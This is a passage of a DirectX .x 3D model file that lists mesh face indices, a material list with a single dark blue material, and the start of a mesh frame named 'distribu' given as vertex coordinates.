4;159,105,106,160;, 4;213,159,160,214;, 4;267,213,214,268;, 4;307,267,268,308;, 4;306,266,267,307;, 4;266,212,213,267;, 4;212,158,159,213;, 4;158,104,105,159;, 4;157,103,104,158;, 4;211,157,158,212;, 4;265,211,212,266;, 4;264,210,211,265;, 4;210,156,157,211;, 4;156,102,103,157;, 4;155,115,102,156;, 4;209,155,156,210;, 3;264,209,210;, 3;209,264,263;, 4;317,263,264,318;, 4;318,264,265,319;, 4;383,317,330,357;, 4;410,383,357,411;, 4;483,410,411,482;, 4;482,536,510,483;, 4;536,563,576,510;, 4;535,562,563,536;, 4;481,535,536,482;, 4;482,411,412,481;, 4;411,357,358,412;, 4;357,330,331,358;, 4;330,276,277,331;, 4;329,275,276,330;, 3;328,275,329;, 3;275,328,274;, 4;274,220,221,275;, 4;273,219,220,274;, 4;272,218,219,273;, 4;218,176,177,219;, 4;219,177,178,220;, 4;177,123,124,178;, 4;176,122,123,177;, 4;175,121,122,176;, 4;229,175,176,218;, 4;271,229,218,272;, 4;325,271,272,326;, 4;326,272,273,327;, 4;372,324,325,373;, 4;434,372,373,435;, 3;403,436,402;, 3;436,403,437;, 4;437,403,404,438;, 4;400,407,404,403;, 4;407,406,405,404;, 4;438,404,405,439;, 5;439,455,456,437,438;, 3;455,439,454;, 4;454,488,489,455;, 4;489,488,487,486;, 4;490,489,486,493;, 4;455,489,490,456;, 3;456,490,457;, 3;457,490,491;, 4;493,492,491,490;, 4;567,621,622,568;, 4;621,675,664,622;, 4;675,717,718,664;, 4;717,771,772,718;, 4;716,770,771,717;, 4;715,769,770,716;, 4;726,768,769,715;, 4;672,726,715,673;, 4;673,715,716,674;, 4;674,716,717,675;, 4;620,674,675,621;, 4;619,673,674,620;, 4;618,672,673,619;, 3;565,618,619;, 3;564,618,565;, 4;563,617,618,564;, 3;671,618,617;, 3;618,671,672;, 4;671,725,726,672;, 4;725,767,768,726;, 4;724,766,767,725;, 4;670,724,725,671;, 4;616,670,671,617;, 4;562,616,617,563;, 4;573,615,616,562;, 3;615,670,616;, 3;615,669,670;, 4;669,723,724,670;, 4;723,777,766,724;, 4;722,776,777,723;, 4;668,722,723,669;, 4;614,668,669,615;, 4;572,614,615,573;, 4;613,667,668,614;, 4;667,721,722,668;, 4;721,775,776,722;, 4;720,774,775,721;, 4;666,720,721,667;, 4;624,666,667,613;, 4;570,624,613,571;, 4;569,623,624,570;, 4;623,665,666,624;, 4;665,719,720,666;, 4;719,773,774,720;, 4;718,772,773,719;, 4;664,718,719,665;, 4;622,664,665,623;, 4;568,622,623,569;, 4;520,568,569,521;, 4;458,520,521,459;, 4;566,620,621,567;, 4;584,638,625,585;, 4;518,584,585,519;, 4;452,518,519,453;, 4;454,439,441,452;, 4;311,257,258,312;, 4;312,258,259,313;, 4;313,259,260,314;, 4;259,205,206,260;, 4;258,204,205,259;, 4;257,217,204,258;, 4;217,163,164,204;, 4;204,164,165,205;, 4;205,165,166,206;, 4;178,124,125,167;, 4;167,125,126,168;, 4;168,126,127,169;, 4;169,127,116,170;, 4;170,116,117,171;, 4;171,117,118,172;, 4;172,118,119,173;, 4;226,172,173,227;, 4;280,226,227,269;, 4;322,280,269,323;, 4;323,269,270,324;, 4;269,227,228,270;, 4;227,173,174,228;, 4;173,119,120,174;, 4;174,120,121,175;, 4;228,174,175,229;, 4;270,228,229,271;, 4;324,270,271,325;, 4;403,402,401,400;, 3;275,221,222;, 4;358,331,342,359;, 4;412,358,359,413;, 4;481,412,413,480;, 4;480,534,535,481;, 4;534,551,562,535;, 4;533,550,551,534;, 4;479,533,534,480;, 4;480,413,414,479;, 4;413,359,360,414;, 4;359,342,343,360;, 4;342,288,289,343;, 4;341,287,288,342;, 3;340,287,341;, 3;287,340,286;, 4;286,232,233,287;, 4;285,231,232,286;, 4;284,230,231,285;, 4;230,188,189,231;, 4;231,189,190,232;, 4;189,135,136,190;, 4;188,134,135,189;, 4;187,133,134,188;, 4;241,187,188,230;, 4;283,241,230,284;, 4;337,283,284,338;, 4;338,284,285,339;, 4;370,336,337,371;, 4;428,370,371,429;, 4;336,282,283,337;, 4;282,240,241,283;, 4;240,186,187,241;, 4;186,132,133,187;, 4;185,131,132,186;, 4;239,185,186,240;, 4;281,239,240,282;, 4;335,281,282,336;, 4;334,292,281,335;, 4;292,238,239,281;, 4;238,184,185,239;, 4;184,130,131,185;, 4;183,129,130,184;, 4;182,128,129,183;, 4;181,139,128,182;, 4;180,138,139,181;, 4;179,137,138,180;, 4;190,136,137,179;, 3;287,233,234;, 4;360,343,354,361;, 4;414,360,361,415;, 4;479,414,415,478;, 4;478,532,533,479;, 4;532,539,550,533;, 4;531,538,539,532;, 4;477,531,532,478;, 4;478,415,416,477;, 4;415,361,362,416;, 4;361,354,355,362;, 4;354,300,301,355;, 4;300,246,247,301;, 4;246,192,193,247;, 4;192,151,152,193;, 4;191,150,151,192;, 4;245,191,192,246;, 3;299,245,246;, 3;299,246,300;, 4;353,299,300,354;, 3;352,299,353;, 3;299,352,298;, 4;298,244,245,299;, 4;244,203,191,245;, 4;243,202,203,244;, 4;242,201,202,243;, 4;296,242,243,297;, 4;297,243,244,298;, 4;350,296,297,351;, 4;349,295,296,350;, 4;295,254,242,296;, 4;254,200,201,242;, 4;200,146,147,201;, 4;201,147,148,202;, 4;202,148,149,203;, 4;203,149,150,191;, 4;247,193,194,248;, 3;302,247,248;, 3;247,302,301;, 4;355,301,302,356;, 4;362,355,356,363;, 4;416,362,363,417;, 4;477,416,417,476;, 4;476,530,531,477;, 4;530,537,538,531;, 4;537,591,592,538;, 3;591,646,592;, 3;591,645,646;, 4;645,699,700,646;, 4;699,753,741,700;, 4;698,752,753,699;, 4;644,698,699,645;, 4;590,644,645,591;, 4;549,590,591,537;, 4;529,549,537,530;, 4;475,529,530,476;, 4;476,417,418,475;, 4;417,363,364,418;, 4;363,356,344,364;, 4;356,302,303,344;, 4;302,248,249,303;, 4;248,194,195,249;, 4;194,140,141,195;, 4;195,141,142,196;, 4;196,142,143,197;, 4;250,196,197,251;, 4;249,195,196,250;, 4;303,249,250,304;, 4;304,250,251,305;, 4;345,304,305,346;, 4;344,303,304,345;, 4;364,344,345,365;, 4;418,364,365,419;, 4;475,418,419,474;, 4;474,528,529,475;, 4;528,548,549,529;, 4;527,547,548,528;, 4;473,527,528,474;, 4;474,419,420,473;, 4;419,365,366,420;, 4;365,345,346,366;, 4;366,346,347,367;, 4;420,366,367,421;, 4;473,420,421,472;, 4;472,526,527,473;, 4;526,546,547,527;, 4;546,600,588,547;, 4;600,641,642,588;, 4;641,695,696,642;, 4;695,749,750,696;, 4;696,750,751,697;, 4;697,751,752,698;, 4;643,697,698,644;, 4;642,696,697,643;, 4;588,642,643,589;, 4;589,643,644,590;, 4;548,589,590,549;, 4;547,588,589,548;, 4;599,640,641,600;, 4;640,694,695,641;, 4;694,748,749,695;, 4;693,747,748,694;, 4;639,693,694,640;, 4;598,639,640,599;, 4;544,598,599,545;, 4;524,544,545,525;, 4;470,524,525,471;, 4;471,422,423,470;, 4;422,368,369,423;, 4;368,348,349,369;, 4;348,294,295,349;, 4;294,253,254,295;, 4;253,199,200,254;, 4;199,145,146,200;, 4;198,144,145,199;, 4;252,198,199,253;, 4;293,252,253,294;, 4;347,293,294,348;, 4;367,347,348,368;, 4;421,367,368,422;, 4;472,421,422,471;, 4;471,525,526,472;, 4;525,545,546,526;, 4;545,599,600,546;, 4;543,597,598,544;, 4;597,651,639,598;, 4;651,692,693,639;, 4;692,746,747,693;, 4;691,745,746,692;, 4;690,744,745,691;, 4;702,743,744,690;, 4;648,702,690,649;, 4;649,690,691,650;, 4;650,691,692,651;, 4;596,650,651,597;, 4;595,649,650,596;, 4;594,648,649,595;, 3;541,594,595;, 3;540,594,541;, 4;539,593,594,540;, 3;647,594,593;, 3;594,647,648;, 4;647,701,702,648;, 4;701,742,743,702;, 4;700,741,742,701;, 4;646,700,701,647;, 4;592,646,647,593;, 4;538,592,593,539;, 4;542,596,597,543;, 4;601,655,656,602;, 4;655,709,710,656;, 4;709,763,764,710;, 4;708,762,763,709;, 4;654,708,709,655;, 4;612,654,655,601;, 4;558,612,601,559;, 4;557,611,612,558;, 4;611,653,654,612;, 4;653,707,708,654;, 4;707,761,762,708;, 4;706,760,761,707;, 4;652,706,707,653;, 4;610,652,653,611;, 4;556,610,611,557;, 4;555,609,610,556;, 4;609,663,652,610;, 4;663,705,706,652;, 4;705,759,760,706;, 4;704,758,759,705;, 4;703,757,758,704;, 4;714,756,757,703;, 4;660,714,703,661;, 4;661,703,704,662;, 4;662,704,705,663;, 4;608,662,663,609;, 4;607,661,662,608;, 4;606,660,661,607;, 3;553,606,607;, 3;552,606,553;, 4;551,605,606,552;, 3;659,606,605;, 3;606,659,660;, 4;659,713,714,660;, 4;713,755,756,714;, 4;712,754,755,713;, 4;658,712,713,659;, 4;604,658,659,605;, 4;550,604,605,551;, 4;561,603,604,550;, 3;603,658,604;, 3;603,657,658;, 4;657,711,712,658;, 4;711,765,754,712;, 4;710,764,765,711;, 4;656,710,711,657;, 4;602,656,657,603;, 4;560,602,603,561;, 4;554,608,609,555;, 4;346,305,293,347;, 4;305,251,252,293;, 4;251,197,198,252;, 4;197,143,144,198;, 4;193,152,140,194;, 4;783,815,816,784;, 4;782,814,815,783;, 4;814,890,891,815;, 4;813,845,890,814;, 4;781,813,814,782;, 4;780,812,813,781;, 4;812,871,845,813;, 4;811,844,871,812;, 4;779,811,812,780;, 4;778,810,811,779;, 4;810,870,844,811;, 4;809,843,870,810;, 4;791,809,810,778;, 4;790,808,809,791;, 4;808,887,843,809;, 4;789,821,808,790;, 4;788,820,821,789;, 4;820,848,886,821;, 4;819,873,848,820;, 4;787,819,820,788;, 4;786,818,819,787;, 4;818,847,873,819;, 4;817,872,847,818;, 4;785,817,818,786;, 4;784,816,817,785;, 4;816,846,872,817;, 4;815,891,846,816;, 14;887,886,848,873,847,872,846,891,890,845,871,844,870,843;, 4;851,852,886,887;, 12;888,885,854,875,853,874,852,851,869,850,868,849;, 4;857,858,885,888;, 12;889,884,860,877,859,876,858,857,879,856,878,855;, 3;440,441,439;, 4;327,273,266,306;, 4;273,274,265,266;, 4;274,328,319,265;, 4;85,86,71,72;, 4;71,41,7,72;, 4;85,6,42,86;, 4;91,5,36,92;, 4;91,92,65,66;, 4;65,35,8,66;, 4;279,280,285,286;, 4;321,279,286,340;, 4;280,322,339,285;, 4;351,297,292,334;, 4;297,298,291,292;, 4;298,352,333,291;, 4;97,98,59,60;, 4;59,29,9,60;, 4;97,4,30,98;, 4;602,560,541,595;, 4;601,602,595,596;, 4;559,601,596,542;, 4;833,834,795,796;, 4;795,863,889,796;, 4;833,884,864,834;, 4;827,885,858,828;, 4;827,828,801,802;, 4;801,857,888,802;, 4;607,608,613,614;, 4;553,607,614,572;, 4;608,554,571,613;, 4;587,627,620,566;, 4;627,628,619,620;, 4;628,574,565,619;, 4;821,822,807,808;, 4;807,851,887,808;, 4;821,886,852,822;, 3;453,454,452;, 6;401,325,308,406,407,400;, 3;307,308,325;, 3;326,307,325;, 4;307,326,327,306;, 4;406,308,374,405;, 4;439,405,374,440;, 4;575,629,630,576;, 4;574,628,629,575;, 4;628,682,683,629;, 3;629,683,684;, 4;683,737,738,684;, 4;682,736,737,683;, 3;629,684,630;, 3;575,576,563;, 3;564,575,563;, 4;575,564,565,574;, 3;318,329,317;, 3;329,330,317;, 4;329,318,319,328;, 4;225,171,172,226;, 4;224,170,171,225;, 4;223,169,170,224;, 4;222,168,169,223;, 4;221,167,168,222;, 4;220,178,167,221;, 3;275,222,276;, 4;276,222,223,277;, 3;223,278,277;, 4;331,277,278,320;, 4;320,278,279,321;, 4;278,224,225,279;, 3;278,223,224;, 4;279,225,226,280;, 4;122,70,71,123;, 4;70,19,41,71;, 4;69,40,19,70;, 4;121,69,70,122;, 4;120,68,69,121;, 4;68,18,40,69;, 4;67,39,18,68;, 4;119,67,68,120;, 4;118,66,67,119;, 4;66,8,39,67;, 4;117,91,66,118;, 4;116,90,91,117;, 4;90,44,5,91;, 4;89,25,44,90;, 4;127,89,90,116;, 4;126,88,89,127;, 4;88,43,25,89;, 4;87,24,43,88;, 4;125,87,88,126;, 4;124,86,87,125;, 4;86,42,24,87;, 4;123,71,86,124;, 3;436,437,432;, 3;433,436,432;, 4;436,433,434,435;, 6;437,456,461,462,431,432;, 4;431,395,396,432;, 4;392,399,396,395;, 4;395,394,393,392;, 3;395,430,394;, 3;430,395,431;, 4;431,462,467,426;, 4;426,467,468,425;, 4;425,387,388,426;, 4;384,391,388,387;, 4;387,386,385,384;, 4;424,386,387,425;, 4;469,424,425,468;, 4;468,506,507,469;, 4;509,508,507,506;, 4;508,544,524,507;, 4;469,507,524,470;, 4;470,423,424,469;, 4;423,369,386,424;, 4;386,369,349,385;, 4;467,505,506,468;, 4;506,505,502,509;, 4;505,504,503,502;, 4;501,500,499,498;, 3;463,498,499;, 3;462,498,463;, 4;461,497,498,462;, 4;498,497,494,501;, 4;497,496,495,494;, 3;457,460,456;, 3;460,461,456;, 4;460,457,458,459;, 4;453,519,488,454;, 4;488,519,585,487;, 6;487,585,568,492,493,486;, 3;567,568,585;, 3;586,567,585;, 4;567,586,587,566;, 4;457,491,520,458;, 4;492,568,520,491;, 4;769,807,822,770;, 4;768,806,807,769;, 4;806,869,851,807;, 4;805,850,869,806;, 4;767,805,806,768;, 4;766,804,805,767;, 4;804,868,850,805;, 4;803,849,868,804;, 4;777,803,804,766;, 4;776,802,803,777;, 4;802,888,849,803;, 4;775,827,802,776;, 4;774,826,827,775;, 4;826,854,885,827;, 4;825,875,854,826;, 4;773,825,826,774;, 4;772,824,825,773;, 4;824,853,875,825;, 4;823,874,853,824;, 4;771,823,824,772;, 4;770,822,823,771;, 4;822,852,874,823;, 4;402,373,325,401;, 4;435,373,402,436;, 4;399,398,397,396;, 3;433,396,397;, 3;432,396,433;, 4;398,324,372,397;, 4;433,397,372,434;, 3;573,562,551;, 3;552,573,551;, 4;573,552,553,572;, 3;320,341,331;, 3;341,342,331;, 4;341,320,321,340;, 6;393,337,324,398,399,392;, 3;323,324,337;, 3;338,323,337;, 4;323,338,339,322;, 4;394,371,337,393;, 4;429,371,394,430;, 4;237,183,184,238;, 4;236,182,183,237;, 4;235,181,182,236;, 4;234,180,181,235;, 4;233,179,180,234;, 4;232,190,179,233;, 3;287,234,288;, 4;288,234,235,289;, 3;235,290,289;, 4;343,289,290,332;, 4;332,290,291,333;, 4;290,236,237,291;, 3;290,235,236;, 4;291,237,238,292;, 4;134,64,65,135;, 4;64,17,35,65;, 4;63,34,17,64;, 4;133,63,64,134;, 4;132,62,63,133;, 4;62,16,34,63;, 4;61,33,16,62;, 4;131,61,62,132;, 4;130,60,61,131;, 4;60,9,33,61;, 4;129,97,60,130;, 4;128,96,97,129;, 4;96,38,4,97;, 4;95,15,38,96;, 4;139,95,96,128;, 4;138,94,95,139;, 4;94,37,15,95;, 4;93,14,37,94;, 4;137,93,94,138;, 4;136,92,93,137;, 4;92,36,14,93;, 4;135,65,92,136;, 6;495,569,556,500,501,494;, 3;555,556,569;, 3;570,555,569;, 4;555,570,571,554;, 3;460,497,461;, 3;497,460,496;, 3;463,466,462;, 3;466,467,462;, 4;466,463,464,465;, 3;430,431,426;, 3;427,430,426;, 4;430,427,428,429;, 4;390,336,370,389;, 4;427,389,370,428;, 4;391,390,389,388;, 3;427,388,389;, 3;426,388,427;, 6;385,349,336,390,391,384;, 3;335,336,349;, 3;350,335,349;, 4;335,350,351,334;, 4;459,521,496,460;, 4;496,521,569,495;, 4;757,801,828,758;, 4;756,800,801,757;, 4;800,879,857,801;, 4;799,856,879,800;, 4;755,799,800,756;, 4;754,798,799,755;, 4;798,878,856,799;, 4;797,855,878,798;, 4;765,797,798,754;, 4;764,796,797,765;, 4;796,889,855,797;, 4;763,833,796,764;, 4;762,832,833,763;, 4;832,860,884,833;, 4;831,877,860,832;, 4;761,831,832,762;, 4;760,830,831,761;, 4;830,859,877,831;, 4;829,876,859,830;, 4;759,829,830,760;, 4;758,828,829,759;, 4;828,858,876,829;, 3;561,550,539;, 3;540,561,539;, 4;561,540,541,560;, 3;332,353,343;, 3;353,354,343;, 4;353,332,333,352;, 4;58,11,29,59;, 4;147,58,59,148;, 4;148,59,98,149;, 4;149,98,99,150;, 4;98,30,12,99;, 4;99,12,31,100;, 4;150,99,100,151;, 4;151,100,101,152;, 4;100,31,13,101;, 4;101,13,32,51;, 4;152,101,51,140;, 4;140,51,52,141;, 4;51,32,0,52;, 4;52,0,26,53;, 4;141,52,53,142;, 4;142,53,54,143;, 4;53,26,1,54;, 4;54,1,27,55;, 4;143,54,55,144;, 4;144,55,56,145;, 4;55,27,10,56;, 4;56,10,28,57;, 4;145,56,57,146;, 4;146,57,58,147;, 4;57,28,11,58;, 4;463,499,522,464;, 4;500,556,522,499;, 4;464,522,523,465;, 4;522,556,557,523;, 6;503,557,544,508,509,502;, 3;543,544,557;, 3;558,543,557;, 4;543,558,559,542;, 3;466,505,467;, 3;505,466,504;, 4;465,523,504,466;, 4;504,523,557,503;, 4;863,864,884,889;, 13;861,893,867,892,866,883,865,882,864,863,881,862,880;, 4;744,795,834,745;, 4;743,794,795,744;, 4;794,881,863,795;, 4;793,862,881,794;, 4;742,793,794,743;, 4;741,792,793,742;, 4;792,880,862,793;, 4;842,861,880,792;, 4;753,842,792,741;, 4;752,841,842,753;, 4;841,893,861,842;, 4;840,867,893,841;, 4;839,892,867,840;, 4;750,839,840,751;, 4;751,840,841,752;, 4;749,838,839,750;, 4;838,866,892,839;, 4;837,883,866,838;, 4;748,837,838,749;, 4;747,836,837,748;, 4;836,865,883,837;, 4;835,882,865,836;, 4;746,835,836,747;, 4;745,834,835,746;, 4;834,864,882,835;; MeshMaterialList { 1; 911; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.247059;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _manifold Frame _distribu { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh distribu { 451; -0.326050;0.440911;-1.312434;, -0.326779;0.436908;-1.312362;, -0.326779;0.432236;-1.312362;, -0.326050;0.428235;-1.312434;, -0.324594;0.424902;-1.312578;, -0.321994;0.421622;-1.312836;, -0.318254;0.418392;-1.313207;, -0.311719;0.416778;-1.313857;, -0.302395;0.416778;-1.314783;, -0.295862;0.418392;-1.315430;, -0.292120;0.421622;-1.315802;, -0.289521;0.424902;-1.316060;, -0.290548;0.424902;-1.326411;, -0.293149;0.421622;-1.326154;, -0.288064;0.428235;-1.316205;, -0.287335;0.432236;-1.316278;, -0.288363;0.432236;-1.326628;, -0.289092;0.428235;-1.326556;, -0.287335;0.436908;-1.316278;, -0.288064;0.440911;-1.316205;, -0.289092;0.440911;-1.326556;, -0.288363;0.436908;-1.326628;, -0.289521;0.444243;-1.316060;, -0.292120;0.447524;-1.315802;, -0.290548;0.444243;-1.326411;, -0.295862;0.450754;-1.315430;, -0.302395;0.452368;-1.314783;, -0.311719;0.452368;-1.313857;, -0.318254;0.450754;-1.313207;, -0.321994;0.447524;-1.312836;, -0.324594;0.444243;-1.312578;, -0.292288;0.452078;-1.289389;, -0.299800;0.454014;-1.288643;, -0.300665;0.452368;-1.297356;, -0.294131;0.450754;-1.298005;, -0.309125;0.454014;-1.287718;, -0.316636;0.452078;-1.286971;, -0.316523;0.450754;-1.295783;, -0.309989;0.452368;-1.296431;, -0.320377;0.448850;-1.286599;, -0.323493;0.444918;-1.286290;, -0.322864;0.444243;-1.295152;, -0.320264;0.447524;-1.295410;, -0.324949;0.441587;-1.286147;, -0.325821;0.436908;-1.286059;, -0.325049;0.436908;-1.294936;, -0.324320;0.440911;-1.295008;, -0.325821;0.432236;-1.286059;, -0.324949;0.427559;-1.286147;, -0.324320;0.428235;-1.295008;, -0.325049;0.432236;-1.294936;, -0.323493;0.424227;-1.286290;, -0.320377;0.420297;-1.286599;, -0.320264;0.421622;-1.295410;, -0.322864;0.424902;-1.295152;, -0.316636;0.417068;-1.286971;, -0.309125;0.415132;-1.287718;, -0.309989;0.416778;-1.296431;, -0.316523;0.418392;-1.295783;, -0.299800;0.415132;-1.288643;, -0.292288;0.417068;-1.289389;, -0.294131;0.418392;-1.298005;, -0.300665;0.416778;-1.297356;, -0.288547;0.420297;-1.289761;, -0.285432;0.424227;-1.290069;, -0.287790;0.424902;-1.298634;, -0.290390;0.421622;-1.298376;, -0.283976;0.427559;-1.290214;, -0.283102;0.432236;-1.290301;, -0.285605;0.432236;-1.298851;, -0.286334;0.428235;-1.298779;, -0.283102;0.436908;-1.290301;, -0.283976;0.441587;-1.290214;, -0.286334;0.440911;-1.298779;, -0.285605;0.436908;-1.298851;, -0.285432;0.444918;-1.290069;, -0.288547;0.448850;-1.289761;, -0.290390;0.447524;-1.298376;, -0.287790;0.444243;-1.298634;, -0.291075;0.455370;-1.289509;, -0.298585;0.459462;-1.288764;, -0.298585;0.457305;-1.288764;, -0.310338;0.459462;-1.287597;, -0.317848;0.455370;-1.286851;, -0.310338;0.457305;-1.287597;, -0.328226;0.442278;-1.285822;, -0.333974;0.437601;-1.285250;, -0.329097;0.437601;-1.285735;, -0.333974;0.431544;-1.285250;, -0.328226;0.426866;-1.285822;, -0.329097;0.431544;-1.285735;, -0.317848;0.413776;-1.286851;, -0.310338;0.409683;-1.287597;, -0.310338;0.411840;-1.287597;, -0.298585;0.409683;-1.288764;, -0.291075;0.413776;-1.289509;, -0.298585;0.411840;-1.288764;, -0.280698;0.426866;-1.290539;, -0.274951;0.431544;-1.291110;, -0.279825;0.431544;-1.290626;, -0.274951;0.437601;-1.291110;, -0.280698;0.442278;-1.290539;, -0.279825;0.437601;-1.290626;, -0.293358;0.414193;-1.289283;, -0.276983;0.426895;-1.290908;, -0.282733;0.422218;-1.290337;, -0.285847;0.418287;-1.290028;, -0.276983;0.442251;-1.290908;, -0.293358;0.454952;-1.289283;, -0.285847;0.450859;-1.290028;, -0.282733;0.446927;-1.290337;, -0.315564;0.454952;-1.287077;, -0.331940;0.442251;-1.285453;, -0.326191;0.446927;-1.286023;, -0.323077;0.450859;-1.286333;, -0.331940;0.426895;-1.285453;, -0.315564;0.414193;-1.287077;, 